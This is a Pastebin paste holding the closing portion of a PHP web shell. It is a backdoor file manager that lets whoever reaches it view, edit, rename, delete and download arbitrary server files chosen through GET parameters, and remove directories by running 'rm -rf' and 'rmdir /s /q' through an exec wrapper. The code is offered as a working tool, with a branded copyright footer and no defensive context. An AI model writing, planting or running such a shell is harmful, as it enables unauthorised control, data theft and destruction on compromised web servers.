  1987. </form>";
  1988. } elseif($_GET['act'] == 'delete_dir') {
  1989. if(is_dir($dir)) {
  1990. if(is_writable($dir)) {
  1991. @rmdir($dir);
  1992. @exe("rm -rf $dir");
  1993. @exe("rmdir /s /q $dir");
  1994. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1995. } else {
  1996. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1997. }
  1998. }
  1999. echo $act;
  2000. } elseif($_GET['act'] == 'view') {
  2001. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2002. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2003. } elseif($_GET['act'] == 'edit') {
  2004. if($_POST['save']) {
  2005. $save = file_put_contents($_GET['file'], $_POST['src']);
  2006. if($save) {
  2007. $act = "<font color=cyan>Saved!</font>";
  2008. } else {
  2009. $act = "<font color=red>permission denied</font>";
  2010. }
  2011. echo "".$act."<br>";
  2012. }
  2013. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2014. echo "<form method='post'>
  2015. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2016. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2017. </form>";
  2018. } elseif($_GET['act'] == 'rename') {
  2019. if($_POST['do_rename']) {
  2020. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2021. if($rename) {
  2022. $act = "<script>window.location='?dir=".$dir."';</script>";
  2023. } else {
  2024. $act = "<font color=red>permission denied</font>";
  2025. }
  2026. echo "".$act."<br>";
  2027. }
  2028. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2029. echo "<form method='post'>
  2030. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2031. <input type='submit' name='do_rename' value='rename'>
  2032. </form>";
  2033. } elseif($_GET['act'] == 'delete') {
  2034. $delete = unlink($_GET['file']);
  2035. if($delete) {
  2036. $act = "<script>window.location='?dir=".$dir."';</script>";
  2037. } else {
  2038. $act = "<font color=red>permission denied</font>";
  2039. }
  2040. echo $act;
  2041. } else {
  2042. if(is_dir($dir) === true) {
  2043. if(!is_readable($dir)) {
  2044. echo "<font color=red>can't open directory. ( not readable )</font>";
  2045. } else {
  2046. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2047. <tr>
  2048. <th class="th_home"><center>Name</center></th>
  2049. <th class="th_home"><center>Type</center></th>
  2050. <th class="th_home"><center>Size</center></th>
  2051. <th class="th_home"><center>Last Modified</center></th>
  2052. <th class="th_home"><center>Owner/Group</center></th>
  2053. <th class="th_home"><center>Permission</center></th>
  2054. <th class="th_home"><center>Action</center></th>
  2055. </tr>';
  2056. $scandir = scandir($dir);
  2057. foreach($scandir as $dirx) {
  2058. $dtype = filetype("$dir/$dirx");
  2059. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2060. if(function_exists('posix_getpwuid')) {
  2061. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2062. $downer = $downer['name'];
  2063. } else {
  2064. //$downer = $uid;
  2065. $downer = fileowner("$dir/$dirx");
  2066. }
  2067. if(function_exists('posix_getgrgid')) {
  2068. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2069. $dgrp = $dgrp['name'];
  2070. } else {
  2071. $dgrp = filegroup("$dir/$dirx");
  2072. }
  2073. if(!is_dir("$dir/$dirx")) continue;
  2074. if($dirx === '..') {
  2075. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2076. } elseif($dirx === '.') {
  2077. $href = "<a href='?dir=$dir'>$dirx</a>";
  2078. } else {
  2079. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2080. }
  2081. if($dirx === '.' || $dirx === '..') {
  2082. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2083. } else {
  2084. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2085. }
  2086. echo "<tr>";
  2087. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2088. echo "<td class='td_home'><center>$dtype</center></td>";
  2089. echo "<td class='td_home'><center>-</center></th></td>";
  2090. echo "<td class='td_home'><center>$dtime</center></td>";
  2091. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2092. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2093. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2094. echo "</tr>";
  2095. }
  2096. }
  2097. } else {
  2098. echo "<font color=red>can't open directory.</font>";
  2099. }
  2100. foreach($scandir as $file) {
  2101. $ftype = filetype("$dir/$file");
  2102. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2103. $size = filesize("$dir/$file")/1024;
  2104. $size = round($size,3);
  2105. if(function_exists('posix_getpwuid')) {
  2106. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2107. $fowner = $fowner['name'];
  2108. } else {
  2109. //$downer = $uid;
  2110. $fowner = fileowner("$dir/$file");
  2111. }
  2112. if(function_exists('posix_getgrgid')) {
  2113. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2114. $fgrp = $fgrp['name'];
  2115. } else {
  2116. $fgrp = filegroup("$dir/$file");
  2117. }
  2118. if($size > 1024) {
  2119. $size = round($size/1024,2). 'MB';
  2120. } else {
  2121. $size = $size. 'KB';
  2122. }
  2123. if(!is_file("$dir/$file")) continue;
  2124. echo "<tr>";
  2125. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2126. echo "<td class='td_home'><center>$ftype</center></td>";
  2127. echo "<td class='td_home'><center>$size</center></td>";
  2128. echo "<td class='td_home'><center>$ftime</center></td>";
  2129. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2130. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2131. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2132. echo "</tr>";
  2133. }
  2134. echo "</table>";
  2135. if(!is_readable($dir)) {
  2136. //
  2137. } else {
  2138. echo "<hr>";
  2139. }
  2140. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/rafi.izudin' target='_blank'><font color=cyan>Mana Ku Tau</font></a></center>";
  2141. }
  2142. ?>
  2143. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!